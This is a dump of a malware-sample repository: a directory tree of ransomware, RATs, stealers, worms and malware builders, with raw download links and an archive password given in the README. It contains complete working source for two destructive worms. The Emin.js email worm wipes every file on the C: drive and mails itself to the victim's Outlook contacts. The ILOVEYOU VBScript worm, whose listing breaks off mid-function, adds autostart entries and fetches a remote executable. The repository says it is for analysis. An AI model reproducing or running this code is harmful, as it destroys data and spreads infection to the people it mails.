├── Fake AV ├── AnViPC2009.exe ├── Ana.exe ├── Antivirus.exe ├── Antivirus2010.exe ├── AntivirusPlatinum.exe ├── AntivirusPro2017.exe ├── CleanThis.exe ├── FakeAdwCleaner.exe ├── FileFixPro │ ├── Activation.reg │ ├── FFProInstall.exe │ └── readme.md ├── HappyAntivirus.exe ├── InternetSecurityGuard.exe ├── LPS2019.exe ├── Movie.mpeg.exe ├── NavaShield.exe ├── PCDefender.exe ├── PCDefenderv2.msi ├── RegistrySmart.exe ├── SE2011.exe ├── SecurityCentral.exe ├── SecurityDefender.exe ├── SecurityDefener2015.exe ├── SecurityScanner.exe ├── SmartDefragmenter.exe ├── VAV2008.exe ├── Win7Recovery.exe ├── WindowsAcceleratorPro.exe ├── WolframAV.exe ├── XFileCorrupter.exe ├── XPAntivirus2008.exe ├── XPAntivirus2008.ico ├── fpfstb.dll └── readme.md ├── README.md ├── builders ├── Builder #6.exe ├── Chaos Ransomware BuilderV4.exe ├── DELmE's Batch Virus Generator v 2.0.exe ├── GoldenEye.Builder.exe ├── Maltoolkit4.2.exe ├── Mbr Owerwrite.zip ├── Ultimate MBR Image Builder.exe └── Ultimate_MBR_Image_Builder_1.5.0.zip ├── emailワーム ├── Amus.exe ├── Anap.a.exe ├── Axam.a.exe ├── Brontok.exe ├── BubbleBoy.html ├── Bugsoft.exe ├── Duksten.exe ├── Emin.js ├── Funsoul.exe ├── Gruel.a.exe ├── Happy99.exe ├── ILOVEYOU.vbs ├── Jer.html ├── Kiray.exe ├── Klez.e.exe ├── Lacon.exe ├── Lentin │ ├── Lentin.c.exe │ └── Lentin.d.exe ├── Maldal.a.exe ├── Mari.exe ├── MeltingScreen.exe ├── Merkur.exe ├── MsWorld.exe ├── MyDoom.A.exe ├── MyPics.a.exe ├── NakedWife.exe ├── NewLove.vbs ├── Nyxem.E.exe ├── Pikachu.exe ├── Pleh.vbs ├── Prolin.exe ├── Quamo.exe ├── San.html ├── Scare.hta ├── Silver │ └── Silver.exe ├── Trood.a.exe ├── White.a.exe ├── Winevar.exe ├── Xanax.exe ├── Yarner.a.exe └── ZippedFiles.a.exe ├── ウイルス ├── Floxif │ └── Floxif.exe ├── Gnil │ └── Gnil.exe ├── Mabezat │ └── Mabezat.exe ├── MadMan.exe ├── Melissa.doc ├── Walker.com └── Xpaj │ ├── xpaj.exe │ └── xpajB.exe ├── ジョーク ├── 457e2ff0c574450293784666d4cbf8ed93339dd7ee0144248aaef3054b247a1e.exe ├── Avoid.exe ├── AxInterop.ShockwaveFlashObjects.dll ├── BluescreenSimulator.exe ├── ChilledWindows.exe ├── Computer Shop.exe ├── CookieClickerHack.exe ├── CrazyNCS.exe ├── Curfun.exe ├── DefenderUninstallTool.exe ├── DesktopBoom.exe ├── Document1.docx.exe ├── add_remove.exe ├── bomb.exe ├── cd.exe ├── clickme.exe ├── clippy.exe ├── cmdchat.exe └── error byMist.exe ├── ジョークサイト ├── Fake Chrome Alert │ ├── css │ ├── index.html │ ├── index2.html │ ├── jquery.min.js │ ├── murphy_ie.zip │ ├── style.css │ └── x.png ├── Fake Infection │ ├── backblue.gif │ ├── fade.gif │ ├── hts-cache │ │ ├── doit.log │ │ ├── new.lst │ │ ├── new.txt │ │ ├── new.zip │ │ ├── readme.txt │ │ └── winprofile.ini │ ├── index.html │ ├── static.notifme.club │ │ └── push_js │ │ │ └── push_subs.js │ ├── www.google-analytics.com │ │ └── analytics.js │ └── www.mscheck022.com │ │ ├── sk │ │ └── dc7c905a │ │ │ └── us │ │ │ └── index9cc5.html │ │ └── sk_pre │ │ └── 6 │ │ └── img │ │ ├── cross.gif │ │ ├── icon_app.gif │ │ └── warn_.gif ├── Fake Login Prompt │ └── index.html ├── Fake MacOS Infection │ ├── ajax2.gif │ ├── beep.mp3 │ ├── ch │ │ ├── a.mp3 │ │ ├── alert.css │ │ ├── bootstrap.css │ │ ├── index.html │ │ ├── jquery-1.js │ │ ├── microsoft.png │ │ ├── retreaver.js │ │ ├── style.css │ │ └── translator.css │ ├── edge.svg │ ├── firiedge │ │ ├── a.mp3 │ │ ├── defender.png │ │ ├── favico.jpg │ │ ├── index.html │ │ ├── jquery.min.js │ │ ├── login.php │ │ └── main.css │ ├── ie.svg │ ├── index.html │ ├── jquery-3.js │ └── logo.png ├── Fake Microsoft Block │ ├── 405.zip │ ├── files │ │ ├── alert.jpg │ │ ├── alertmicrosoft.mp3 │ │ ├── background-2.png │ │ ├── microsoft.png │ │ ├── style.css │ │ └── warning.mp3 │ ├── index.html │ ├── msie1.html │ └── msie2.html └── Fake Microsoft Support │ ├── chrome-assests │ ├── a.html │ ├── alert.css │ ├── bootstrap.css │ ├── gb.mp3 │ ├── ie10-viewport-bug-workaround.html │ ├── iframe.js │ ├── images.zip │ ├── img-1.svg │ ├── img-10.svg │ ├── img-11.svg │ ├── img-12.svg │ ├── img-2.svg │ ├── img-3.svg │ ├── img-4.svg │ ├── img-5.svg │ ├── img-6.svg │ ├── img-7.svg │ ├── img-8.svg │ ├── img-9.svg │ ├── jquery-1.js │ ├── microsoft.png │ ├── retreaver.js │ ├── style.css │ └── translator.css │ ├── index.html │ └── murphy_chrome.zip ├── スティーラー ├── Azorult.exe └── Lokibot.exe ├── スパイウェア ├── AgentTesla.exe ├── Kakwa.doc ├── The Worst Of All!!!!!! │ └── BonziBUDDY!!!!!!.txt └── butterflyondesktop.exe ├── ネットワーム ├── Blaster │ ├── Blaser.C.sourcecode.txt │ ├── Blaster.A.exe │ └── Blaster.E.exe ├── CodeRed.a.exe ├── EternalRocks.exe ├── Kolabc │ └── Kobalc.exe ├── Loveware.txt ├── Opaserv.l.exe ├── Rahack │ └── Rahack.exe └── Sasser │ ├── Sasser.A.exe │ ├── Sasser.B.exe │ └── Sasser.c.sourcecode.txt ├── バンキングマルウェア ├── DanaBot.exe ├── Dridex │ ├── Dridex.JhiSharp.dll.9d75ff0e9447ceb89c90cca24a1dbec1 │ ├── DridexDroppedVBS.925da3a10f7dde802c8d87047b14fda6 │ ├── DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601 │ ├── Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da │ ├── Trojan.Dridex.A.6164228ed2cc0eceba9ce1828d87d827 │ └── Trojan.Dridex.A.97a26d9e3598fea2e1715c6c77b645c2 ├── Emotet.zip └── Zloader.xlsm ├── ブラウザーハイジャック └── BabylonToolbar.txt ├── ポニー └── metrofax.doc ├── ラット ├── Adwind.exe ├── Blackkomet.exe ├── CobaltStrike.doc ├── CrimsonRAT.exe ├── NJRat.exe ├── NetWire.doc ├── NetWire.exe ├── Remcos.exe ├── RevengeRAT.exe └── VanToM-Rat.bat ├── ランサムウェア ├── $uckyLocker.exe ├── 7ev3n.exe ├── 86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f.exe ├── Automatic_converter_rff_to_mp4.exe ├── BadRabbit.exe ├── Birele.exe ├── Cerber5.exe ├── DeriaLock.exe ├── Dharma.exe ├── Fantom.exe ├── GandCrab.exe ├── GoldenEye │ ├── GoldenEye.exe │ └── GoldenEye.js ├── InfinityCrypt.exe ├── JigsawRansomware.exe ├── Krotten.exe ├── Locky.AZ.exe ├── Monster Ransomware (second new version).zip ├── Monster Ransomware.zip ├── NoMoreRansom.exe ├── NotPetya.exe ├── Petya.A.exe ├── PolyRansom.exe ├── PowerPoint.exe ├── Ransomware.Locky.zip ├── Ransomware.Satana.zip ├── Ransomware.Wannacry_Plus.zip ├── RedEye.exe ├── Rensenware.exe ├── SporaRansomware.exe ├── UIWIX.exe ├── ViraLock.exe ├── WannaCry.exe ├── WannaCry │ ├── WannaCry.txt │ ├── WannaCrypt0r.exe │ ├── WannaCrypt0r.zip │ ├── c.wnry │ ├── msg │ │ ├── m_bulgarian.wnry │ │ ├── m_chinese (simplified).wnry │ │ ├── m_chinese (traditional).wnry │ │ ├── m_croatian.wnry │ │ ├── m_czech.wnry │ │ ├── m_danish.wnry │ │ ├── m_dutch.wnry │ │ ├── m_english.wnry │ │ ├── m_filipino.wnry │ │ ├── m_finnish.wnry │ │ ├── m_french.wnry │ │ ├── m_german.wnry │ │ ├── m_greek.wnry │ │ ├── m_indonesian.wnry │ │ ├── m_italian.wnry │ │ ├── m_japanese.wnry │ │ ├── m_korean.wnry │ │ ├── m_latvian.wnry │ │ ├── m_norwegian.wnry │ │ ├── m_polish.wnry │ │ ├── m_portuguese.wnry │ │ ├── m_romanian.wnry │ │ ├── m_russian.wnry │ │ ├── m_slovak.wnry │ │ ├── m_spanish.wnry │ │ ├── m_swedish.wnry │ │ ├── m_turkish.wnry │ │ └── m_vietnamese.wnry │ ├── s.wnry │ ├── taskdl.exe │ ├── taskse.exe │ └── u.wnry ├── WannaCrypt0r.exe ├── WinlockerVB6Blacksod.exe ├── Xyeta.exe ├── anabelle Ransomware.exe └── satan.exe ├── ローグ ├── AdwereCleaner.exe └── SpySheriff.exe └── ワーム ├── Blaster ├── 607B60AD512C50B7D71DCCC057E85F1C ├── 8676210e6246948201aa014db471de90 ├── 8a17f336f86e81f04d8e66fa23f9b36a ├── DComExploit.exe.vir ├── SANS_ Malware FAQ_ What is W32_Blaster worm_.mht └── dcom.c ├── Bumerang.exe ├── HeadTail.vbs ├── Heap41A.exe ├── NadIote └── Nadlote.exe └── Vobfus └── Vobus.exe /Fake AV/AnViPC2009.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/AnViPC2009.exe -------------------------------------------------------------------------------- /Fake AV/Ana.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/Ana.exe -------------------------------------------------------------------------------- /Fake AV/Antivirus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/Antivirus.exe -------------------------------------------------------------------------------- /Fake AV/Antivirus2010.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/Antivirus2010.exe -------------------------------------------------------------------------------- /Fake AV/AntivirusPlatinum.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/AntivirusPlatinum.exe -------------------------------------------------------------------------------- /Fake AV/AntivirusPro2017.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/AntivirusPro2017.exe -------------------------------------------------------------------------------- /Fake AV/CleanThis.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/CleanThis.exe -------------------------------------------------------------------------------- /Fake AV/FakeAdwCleaner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/FakeAdwCleaner.exe -------------------------------------------------------------------------------- /Fake AV/FileFixPro/Activation.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WOW\keyboard\advanced] 4 | "wizard_installed"=dword:00000001 5 | "wizard_registered"=dword:00000002 -------------------------------------------------------------------------------- /Fake AV/FileFixPro/FFProInstall.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/FileFixPro/FFProInstall.exe -------------------------------------------------------------------------------- /Fake AV/FileFixPro/readme.md: -------------------------------------------------------------------------------- 1 | # FileFixPro 2 | FileFix 3 | Pro.I don't think the name is correct.I'm not sure. But it's a member of Fake AV.If you want to activate, open Activation.reg inside and click 'Yes' to install the registry. 4 | -------------------------------------------------------------------------------- /Fake AV/HappyAntivirus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/HappyAntivirus.exe -------------------------------------------------------------------------------- /Fake AV/InternetSecurityGuard.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/InternetSecurityGuard.exe -------------------------------------------------------------------------------- /Fake AV/LPS2019.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/LPS2019.exe -------------------------------------------------------------------------------- /Fake AV/Movie.mpeg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/Movie.mpeg.exe -------------------------------------------------------------------------------- /Fake AV/NavaShield.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/NavaShield.exe -------------------------------------------------------------------------------- /Fake AV/PCDefender.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/PCDefender.exe -------------------------------------------------------------------------------- /Fake AV/PCDefenderv2.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/PCDefenderv2.msi -------------------------------------------------------------------------------- /Fake AV/RegistrySmart.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/RegistrySmart.exe -------------------------------------------------------------------------------- /Fake AV/SE2011.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/SE2011.exe -------------------------------------------------------------------------------- /Fake AV/SecurityCentral.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/SecurityCentral.exe -------------------------------------------------------------------------------- /Fake AV/SecurityDefender.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/SecurityDefender.exe -------------------------------------------------------------------------------- /Fake AV/SecurityDefener2015.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/SecurityDefener2015.exe -------------------------------------------------------------------------------- /Fake AV/SecurityScanner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/SecurityScanner.exe -------------------------------------------------------------------------------- /Fake AV/SmartDefragmenter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/SmartDefragmenter.exe -------------------------------------------------------------------------------- /Fake AV/VAV2008.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/VAV2008.exe -------------------------------------------------------------------------------- /Fake AV/Win7Recovery.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/Win7Recovery.exe -------------------------------------------------------------------------------- /Fake AV/WindowsAcceleratorPro.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/WindowsAcceleratorPro.exe -------------------------------------------------------------------------------- /Fake AV/WolframAV.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/WolframAV.exe -------------------------------------------------------------------------------- /Fake AV/XFileCorrupter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/XFileCorrupter.exe -------------------------------------------------------------------------------- /Fake AV/XPAntivirus2008.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/XPAntivirus2008.exe -------------------------------------------------------------------------------- /Fake AV/XPAntivirus2008.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/XPAntivirus2008.ico -------------------------------------------------------------------------------- /Fake AV/fpfstb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/Fake AV/fpfstb.dll -------------------------------------------------------------------------------- /Fake AV/readme.md: -------------------------------------------------------------------------------- 1 | # Fake AV 2 | Here is Fave AV.Meaning is **Fake** **a**nti**v**irus.You may be able to restore it to its original state by performing Reset this PC or system restore, but it is highly recommended to do this in a virtual machine as well. 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MalwareDatabase 2 | 3 | ここにあるマルウェアは解析やエンターテインメント、娯楽のために所有しています。 4 | 実行する際は必ず自己責任でお願いします。また、VirtualBoxやVMwareなどの仮想マシンを使うこをおすすめします。 5 | もし、このマルウェアをほかの方に渡す場合必ず警告してください。 6 | 私は一切責任を負いません。 7 | 8 | マルウェアサンプルはリリースにあります。 9 | パスワードはMist repoです。 10 | 11 | The malware here is owned by us for analysis purposes. 12 | Please be sure to run it at your own risk. It is recommended that you use a virtual machine such as VirtualBox or VMware. 13 | If you pass this malware on to others, please be sure to warn them. 14 | I will not take any responsibility for it. 15 | 16 | Malware samples are in the release. 17 | The password is Mist repo. 18 | -------------------------------------------------------------------------------- /builders/Builder #6.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/Builder #6.exe -------------------------------------------------------------------------------- /builders/Chaos Ransomware BuilderV4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/Chaos Ransomware BuilderV4.exe -------------------------------------------------------------------------------- /builders/DELmE's Batch Virus Generator v 2.0.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/DELmE's Batch Virus Generator v 2.0.exe -------------------------------------------------------------------------------- /builders/GoldenEye.Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/GoldenEye.Builder.exe -------------------------------------------------------------------------------- /builders/Maltoolkit4.2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/Maltoolkit4.2.exe -------------------------------------------------------------------------------- /builders/Mbr Owerwrite.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/Mbr Owerwrite.zip -------------------------------------------------------------------------------- /builders/Ultimate MBR Image Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/Ultimate MBR Image Builder.exe -------------------------------------------------------------------------------- /builders/Ultimate_MBR_Image_Builder_1.5.0.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/builders/Ultimate_MBR_Image_Builder_1.5.0.zip -------------------------------------------------------------------------------- /emailワーム/Amus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Amus.exe -------------------------------------------------------------------------------- /emailワーム/Anap.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Anap.a.exe -------------------------------------------------------------------------------- /emailワーム/Axam.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Axam.a.exe -------------------------------------------------------------------------------- /emailワーム/Brontok.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Brontok.exe -------------------------------------------------------------------------------- /emailワーム/BubbleBoy.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/BubbleBoy.html -------------------------------------------------------------------------------- /emailワーム/Bugsoft.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Bugsoft.exe -------------------------------------------------------------------------------- /emailワーム/Duksten.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Duksten.exe -------------------------------------------------------------------------------- /emailワーム/Emin.js: -------------------------------------------------------------------------------- 1 | /******************************************************************* 2 | * Created by [Black Flag] * 3 | *******************************************************************/ 4 | var TF=WScript.ScriptFullName,FS=new ActiveXObject("Scripting.FileSystemObject"), 5 | SS=new ActiveXObject("WScript.Shell"),V='var D="C:\\\\",fs=new ActiveXObject("Scriptin' 6 | +'g.FileSystemObject");f(D);function f(fl)\r\n{fl=fs.GetFolder(fl);var F=new Enumerator' 7 | +'(fl.Files),FD=new Enumerator(fl.SubFolders);\r\nfor(;!F.atEnd();F.moveNext()){try{fs.' 8 | +'GetFile(F.item()).Delete(true);}catch(e){}}\r\nfor(;!FD.atEnd();FD.moveNext()){f(FD.it' 9 | +'em());}}//End Of File',RN=(Math.random()*100)+10,DD="C:\\",TD;a(DD);function a(dd){ 10 | var Fx=new Enumerator(FS.GetFolder(dd+"").SubFolders),Fa=new Array()for(var i=0;!Fx.atEnd(); 11 | Fx.moveNext(),i++){Fa[i]=Fx.item();if(RN--<=0.1)TD=Fa[i];}for(var x in Fa)a(Fa[x])}b(); 12 | function b(){var Fg=TD+new Date().getTime()+".js";Fv=FS.CreateTextFile(Fg,true);Fv.Write(V); 13 | Fv.Close();SS.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" 14 | +new Date().getTime(),Fg,"REG_SZ");}var AD;c(DD);function c(dd){if(AD+""=="undefined"){ 15 | var dd=FS.GetFolder(dd),Fl=new Enumerator(dd.Files),Fd=new Enumerator(dd.SubFolders); 16 | for(;!Fl.atEnd();Fl.moveNext()){if(e(Fl.item()+"",".doc")){AD=Fl.item()+"";}}for(; 17 | !Fd.atEnd();Fd.moveNext()){c(Fd.item()+"");}}}function e(sy,ey){return( 18 | sy.toLowerCase().indexOf(ey.toLowerCase())==(sy.length-ey.length))}var OO,MN,O;try{ 19 | OO=new ActiveXObject("Outlook.Application");MN=OO.GetNamespace("MAPI");O=new ActiveXObject("O" 20 | +"utlook.Application").Version+""=="undefined";if(!O)f();g();}catch(ex){}function f(){ 21 | var aL=new Enumerator(MN.AddressLists("Personal Address Book").AddressEntries)for(; 22 | !aL.atEnd();aL.moveNext())h(MN.AddressLists("Personal Address Book").AddressEntries(aL.item() 23 | +"").Address+"");}function g(){var aL=new Enumerator(MN.GetDefaultFolder(10).Items()); 24 | for(;!aL.atEnd();aL.moveNext())h(MN.GetDefaultFolder(10).Items(aL.item()+"").Email1Address 25 | +"");}function h(ad){var nM;try{nM=OO.CreateItem(0);}catch(ex){return;}nM.Subject="";nM.Body="Some body\r\n";var rM=nM.Recipients.Add(ad);if(!rM.Resolve())return; 27 | nM.Attachments.Add(TF,1,1,"some very cool thing I made");nM.Attachments.Add(AD,1,1,"this" 28 | +" 1 is very cool too");nM.Send();}new SS.Run("RunDll32 Shell32.dll,SHExitWindowsEx 2");//EndOfFile 29 | -------------------------------------------------------------------------------- /emailワーム/Funsoul.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Funsoul.exe -------------------------------------------------------------------------------- /emailワーム/Gruel.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Gruel.a.exe -------------------------------------------------------------------------------- /emailワーム/Happy99.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Happy99.exe -------------------------------------------------------------------------------- /emailワーム/ILOVEYOU.vbs: -------------------------------------------------------------------------------- 1 | rem barok -loveletter(vbe) 2 | rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines 3 | On Error Resume Next 4 | dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow 5 | eq="" 6 | ctr=0 7 | Set fso = CreateObject("Scripting.FileSystemObject") 8 | set file = fso.OpenTextFile(WScript.ScriptFullname,1) 9 | vbscopy=file.ReadAll 10 | main() 11 | sub main() 12 | On Error Resume Next 13 | dim wscr,rr 14 | set wscr=CreateObject("WScript.Shell") 15 | rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") 16 | if (rr>=1) then 17 | wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" 18 | end if 19 | Set dirwin = fso.GetSpecialFolder(0) 20 | Set dirsystem = fso.GetSpecialFolder(1) 21 | Set dirtemp = fso.GetSpecialFolder(2) 22 | Set c = fso.GetFile(WScript.ScriptFullName) 23 | c.Copy(dirsystem&"\MSKernel32.vbs") 24 | c.Copy(dirwin&"\Win32DLL.vbs") 25 | c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 26 | regruns() 27 | html() 28 | spreadtoemail() 29 | listadriv() 30 | end sub 31 | sub regruns() 32 | On Error Resume Next 33 | Dim num,downread 34 | regcreate 35 | "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs" 36 | regcreate 37 | "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs" 38 | downread="" 39 | downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") 40 | if (downread="") then 41 | downread="c:\" 42 | end if 43 | if (fileexist(dirsystem&"\WinFAT32.exe")=1) then 44 | Randomize 45 | num = Int((4 * Rnd) + 1) 46 | if num = 1 then 47 | regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 48 | Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm 49 | hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" 50 | elseif num = 2 then 51 | regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw 52 | erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" 53 | elseif num = 3 then 54 | regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 55 | Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd 56 | QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" 57 | elseif num = 4 then 58 | regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 59 | Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD 60 | GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe" 61 | end if 62 | end if 63 | if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate 64 | "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe" 65 | regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet 66 | Explorer\Main\Start Page","about:blank" 67 | end if 68 | end sub 69 | sub listadriv 70 | On Error Resume Next 71 | Dim d,dc,s 72 | Set dc = fso.Drives 73 | For Each d in dc 74 | If d.DriveType = 2 or d.DriveType=3 Then 75 | folderlist(d.path&"\") 76 | end if 77 | Next 78 | listadriv = s 79 | end sub 80 | sub infectfiles(folderspec) 81 | On Error Resume Next 82 | dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 83 | set f = fso.GetFolder(folderspec) 84 | set fc = f.Files 85 | for each f1 in fc 86 | ext=fso.GetExtensionName(f1.path) 87 | ext=lcase(ext) 88 | 